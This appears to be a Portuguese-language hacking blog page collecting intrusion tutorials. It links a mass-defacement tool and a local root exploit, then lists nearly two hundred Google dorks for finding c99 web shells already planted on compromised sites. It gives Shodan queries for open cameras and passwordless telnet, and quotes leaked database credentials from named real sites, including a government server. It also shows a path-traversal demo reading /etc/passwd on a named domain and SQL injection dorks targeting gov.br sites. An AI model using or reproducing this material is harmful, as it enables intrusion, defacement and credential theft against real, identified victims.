example : perl MSRml.pl /tmp/index.html <~ exemplo.

-
download do tool mas deface:
-
http://www.4shared.com/file/ib4_kI2B/massdeface.html
-
-

Video aula do Hackinho:
-
http://www.4shared.com/get/dvHGExJY/Mass_By_Hackinhompeg.html
-
Só para incrementar o tuto: XPL para a versão do kernel 2.6.18 local root '2010'
-
-
http://www.multiupload.com/YQRO5FK0T1

Créditos: TSH

Procurando por shell c99 upadas

Dica bem básica pra encontrar a famosa shell c99

Talvez alguém aqui já se viu com um site vulnerável, mas não tinha shell upada por isso teve que upar uma, pra então fazer o serviço que pretendia...

Estes dork's vão ajudar Você a encontrar uma já upada... só usar...

001.safe-mode: off (not secure) drwxrwxrwx c99shell
002.inurl:c99.txt
003.inurl:c99.php uid=0(root)
004.root c99.php
005."Captain Crunch Security Team" inurl:c99
006.download c99.php
007.inurl:c99.php
008.allinurl: c99.php
009.allinurl: c99.txt
010.inurl:"/c99.php"
011.inurl:"c99.php" c99shell
012.inurl:c99.php uid=0(root)
013.c99shell powered by admin
014.inurl:"/c99.php"
015.c99 shell v.1.0 (roots)
016.allintitle: "c99shell"
017.inurl:"c99.php
018.allinurl: "c99.php"
019.intitle:C99Shell v. 1.0 pre-release +uname
020.intitle:C99Shell v. 1.0 pre-release +uname
021.allinurl: "c99.php"
022.inurl:"c99.php"
023.inurl:"c99.php"
024.inurl:"c99.php" c99shell
025.inurl:"c99.php"
026.inurl:"/c99.php
027.inurl:c99.php?
028.inurl:/c99.php+uname
029.allinurl:"c99.php"
030.inurl:"c99.php"
031.allinurl:c99.php?
032."inurl:c99..php"
033.allinurl:c99.php
034.c99shell [file on secure ok ]?
035.inurl:c99.php
036.powered by Captain Crunch Security Team
037.allinurl:c99.php
038."c99.php" filetype:php
039.allinurl:c99.php
040.inurl:c99shell.php
041.allinurl:.c99.php
042."inurl:c99.php"
043.c99. PHP-code Feedback Self remove
044.allinurl:c99.php
045.download c99.txt
046.inurl:c99shell.txt
047.allinurl: "c99.php"
048.allinurl:c99.php
049.allinurl:c99.php
050.c99shell
051.inurl:c99.php
052.intitle:C99Shell v. 1.0 pre-release +uname
053.allinurl:"c99.php"
054.inurl:c99.php
055.safe-mode: off (not secure) drwxrwxrwx c99shell
056.inurl:/c99.php
057.inurl:"c99.php"
058.inurl:c99.php
059.c99.php download
060.inurl:"c99.php"
061.inurl:/c99.php
062.inurl:"c99.php?"
063.files/c99.php
064.c99shell filetype:php -echo
065.c99shell powered by admin
066.inurl:"c99.php"
067.inurl:c99.php uid=0(root)
068.inurl:"c99.php"
069.inurl:"/c99.php" intitle:"C99shell"
070.C99Shell v. 1.0 pre-release build #5
071.inurl:c99.php
072.inurl:c99.php
073.--[ c99shell v. 1.0 pre-release build #16
074.c99shell linux infong
075.C99Shell v. 1.0 pre-release build
076.!C99Shell v. 1.0 beta!
077.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
078.!c99shell v. 1+Safe-mode: OFF (not secure)
079."C99Shell v. 1.0 pre-release build "
080.intitle:c99shell +filetype:php
081.intitle:C99Shell v. 1.0 pre-release +uname
082."Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
083.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
084.intitle:!C99Shell v. 1.0 pre-release build #16! root
085.!C99Shell v. 1.0 pre-release build #5!
086.C99Shell v. 1.0 pre-release build #16!
087.intitle:c99shell intext:uname
088.allintext:C99Shell v. 1.0 pre-release build #12
089.c99shell v. 1.0 pre-release build #16
090.--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
091.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
092."c99shell v 1.0"
093.ftp apache inurl:c99.php
094.c99shell+v.+1.0 16
095.C99Shell v. 1.0 pre-release build #16 download
096.intitle:c99shell "Software: Apache"
097.allinurl: c99.php
098.allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
099. 
100.Logout
101.powered by Captain Crunch Security Team
102.!C99Shell v. 1.0 pre-release build #5!
103.c99shell v. 1.0 release security
104.c99shell v. 1.0 pre-release build
105.c99shell [file on secure ok ]?
106.C99Shell v. 1.3
107.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
108.inurl:c99.php uid=0(root)
109.powered by Captain Crunch Security Team
110.C99Shell v. 1.0 pre-release build #16
111.c99shell[on file]ok
112.c99shell[file on ]ok
113.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
114."C99Shell v. 1.0 pre"
115.=C99Shell v. 1.0 pre-release
116.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
117.c99shell v. pre-release build
118.inurl:c99.php c99 shell
119.inurl:c99.php c99 shell
120.powered by Captain Crunch Security Team
121.C99Shell v. 1.0 pre-release build #16!
122.C99Shell v. 1.0 pre-release build #16 administrator
123.intitle:c99shell filetype:php
124.powered by Captain Crunch Security Team
125.powered by Captain Crunch Security Team
126.C99Shell v. 1.0 pre-release build #12
127.c99shell v.1.0
128."c99shell v. 1.0 pre-release build"
129.inurl:"c99.php" filetype:php
130."c99shell v. 1.0 "
131.ok c99.php
132.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
133.c99shell v. 1.0 pre-release build #16 |
134.!C99Shell v. 1.0 pre-release build #5!
135.!C99Shell v. 1.0 pre-release build #5!
136.powered by Captain Crunch Security Team
137.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
138.powered by Captain Crunch Security Team
139.C99Shell v. 1.0 pre-release
140.inurl:c99.php ext:php
141.allinurl:"c99.php"
142.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
143.powered by Captain Crunch Security Team
144.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
145.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout"
146.C99Shell v. 1.0 pre-release build #16 software apache
147.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
148."c99shell v 1.0"
149.allintitle: C99shell filetype:php
150.C99Shell v. 1.0 pre-release build #16!
151."c99shell v. 1.0 pre-release"
152.c99shell v. 1.0 pre-release build #5
153.allinurl:"c99.php" filetype:php
154.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
155.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
156.!C99Shell v. 1.0 pre-release build #16!
157.intitle:C99Shell v. 1.0 pre-release +uname
158.c99shell v. 1.0
159.--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
160.inurl:"/c99.php"
161.c99shell +uname
162.c99shell php + uname
163.c99shell php + uname
164.--[ c99shell v. 1.0 pre-release build #16 powered by Captain Crunch Security Team | ]--
165.!C99Shell v. 1.0 pre-release build #5!
166.C99Shell v.1.0 pre-release
167.Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
168.intitle:c99shell filetype:php
169."Encoder Tools Proc. FTP brute"
170."c99" filetype:php intext:"Safe-Mode: OFF"
171.c99shell v. 1.0 pre
172.intitle:c99shell uname -bbpress
173.intitle:"index.of" c99.php
174.inurl:admin/files/
175.intitle:"index of /" "c99.php"
176.intitle:"index of" intext:c99.php
177.intitle:index.of c99.php
178.intitle:"index of" + c99.php
179.intitle:index/of file c99.php
180.intitle:index/of file c99.php
181.index of /admin/files/
182.intitle:"Index of/"+c99.php
183.c99.php "intitle:Index of "
184.c99.php "intitle:Index of "
185.c99.php "intitle:Index of "
186.intitle:index.of c99.php
187.img/c99.php
188.intitle:index.of c99.php
189.img.c99.php
190.intitle:"Index of/"+c99.php
191."index of /" c99.php
192.intitle:"Index of" c99.php
193."index of" c99.php
194."Index of/"+c99.php


é isso pessoal, Bom proveito... 

Vulnerabilidade Research

Olá a todos, neste tutorial eu vou mostrar como encontrar varias vulnerabilidades em cms, web , serviços remoto e etc... algumas coisas básicas outras avançadas no entanto tudo é vuln do mesmo jeito . Aqui neste tutorial você vai ter uma ideia de como é faicil invadir sistemas hoje .

Além do Google Hacking Database ( http://www.exploit-db.com/google-dorks/ ) e outros serviços do gênero existem varios outros serviços voltados a pesquisa de vulnerabilidades. Vou começar postando um sistema web only de buscar por vulnerabilidades muito GOOD em especial pra quem gosta de brincar com metasploit, agora vc pode passar o dia todo exploitando empresas e sites comum basta saber pesquisar, bem eu estou falando do ( SHODAN - Computer Search Engine ) www.shodanhq.com desenvolvido por
http://twitter.com/#!/achillean vamos aos exemplos de pesquisa, vc algumas vez ja encontrou um servi rodando o IIS 1.0 pelo google ? quase impossivel né, mais com o SHODAN quase todas os serviços vuln é possivel pesquisar, vejamos alguns exemplos :

http://shodan.surtri.com/?q="iis/1.0";
http://shodan.surtri.com/?q="iis/2.0";
http://shodan.surtri.com/?q="iis/3.0";
http://shodan.surtri.com/?q="iis/4.0";
Veja o resultado vai se surpreender, vamos a outros exemplos .

Aparelhos DVR com interface WEB exposta:
http://shodan.surtri.com/?q=DVR

Máquinas com busybox telnet sem senha:
http://shodan.surtri.com/?q=port%3A23+%22list+of+built-in+commands%22)

Cameras de Segurança abertas na Internet:
http://shodan.surtri.com/?q=port%3A80+%22Camera%22+%22HTTP%2F1.0+200+OK%22

Agora vc pode combinar os novas falhas e 0days que sai em sites de exploits e usar o SHODAN para pesquisar serviços vulneraveis .

Vejam algumas outros exemplos de busca postado em um site voltado a pentest

http://www.pentestit.com/shodan-queries/

Encontrando arquivos senssíveis (GOOD)

Dorks: allinurl:/conecta_mysql.inc - intext:db filetype:inc -

http://www.ezsitebuilder.com/php/db.inc

//$host = "db1.actadivina.com";
//$host = "localhost";
//$db_name = "QS_devil";
//$db_name = "Authors";

http://smlick.net/include/db.inchttp://smlick.net/include/db2.inc

$user = 'root';
$pass = 'orange';
$host = "localhost";
$db_name = 'hanc'

Olha esse aqui, qui legal, pena que pra conectar tem que tar dentro da rede interna deles, se obter acesso a algum site do mesmo servi vc pode conectar .
http://www.pge.mt.gov.br/novosite2/biblioteca/conexao.inc

$db = mysql_connect("192.168.3.80", "root", "cpdpge");

http://gaia.saude.mg.gov.br/conf_pentagrama/conf_site.inc
-
http://www.webfocobrasil.com.br/clientes/schimitt/conecta_mysql.inc
-
http://www.afp.mil.ph/Nolcom/Include/db_connect.inc

Como são varios sites eu vou por só um exemplo de dork que ja contem varios vuln no google .

d0rk: inurl:download_file.php?file= site:hr
-
demo: www.politologija.hr/download_file.php?file=../../../../../../../../../../../../etc/passwd .



Encontrando Falhas de SQL-Injection (interessante) .

Muita gente ja fez vídeos, tutoriais com novas dorks e tal, aqui eu vou mostrar somente uma que vale por todas :

inurl:*.php?id=

isso mesmo, dái vc ja pode incrementar mais especificando de qual dóminio vc quer fazer a busca, exemplos; dóminios com.br,gov.br e org e varios outros .

site:gov.br inurl:*.php?id=

Explicação : nesses exemplo, observe que ao invéis de por noticia.php?id= ou pagina.php?id= ou qualquermerda.php?id= eu simplesmente coloco um "*" isso quer dizer que pode vir qualquer coisa .

Simplesmente pesquise no google por: inurl:"search.php?q=" - inurl:"search.asp?q=" - inurl:"buscar.php?q="

daí ja da uma noção para novas dorks né ?

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More